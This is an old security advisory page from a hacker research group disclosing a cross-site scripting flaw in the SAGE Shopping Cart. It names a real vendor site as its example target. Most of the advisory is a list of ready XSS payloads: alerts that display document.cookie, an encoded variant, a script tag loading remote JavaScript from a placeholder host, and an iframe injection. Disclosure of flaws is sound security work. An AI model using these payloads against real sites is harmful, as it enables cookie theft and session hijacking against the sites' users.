Home » HSC Research » Advisories » [HSC] SAGE Shopping Cart XSS Vulnerability [HSC] SAGE Shopping Cart XSS Vulnerability HSC Research Group - Advisories Written by Hackers Center    Wednesday, 27 September 2006 01:47 ############################################################### ---------------------------- [HSC] HackersCenter IT Security Research Team --------------------------- ############################################################### "SAGE Shopping Cart XSS Vulnerability" [Vendor]: www.sageworld.com [Example] www.promoplace.com/your_account This allows to alert cookie and even modify cookies. Risk: Moderate Pic: http://img211.imageshack.us/img211/6118/snapshotgz2.png Other XSS: "><plaintext> <script>alert("XSS");</script> <script>alert(document.cookie);</script> <script>alert(String.fromCharCode(88,83,83))</script> <script src=http://www.Site.com/XSS.js></script> >"<iframe src=http://www.Site.com width=815 height=505></script> - Need Fix? Contact www.securityforge.com

Security Services by HSC Contact us Become partner Advertise with us Join our staff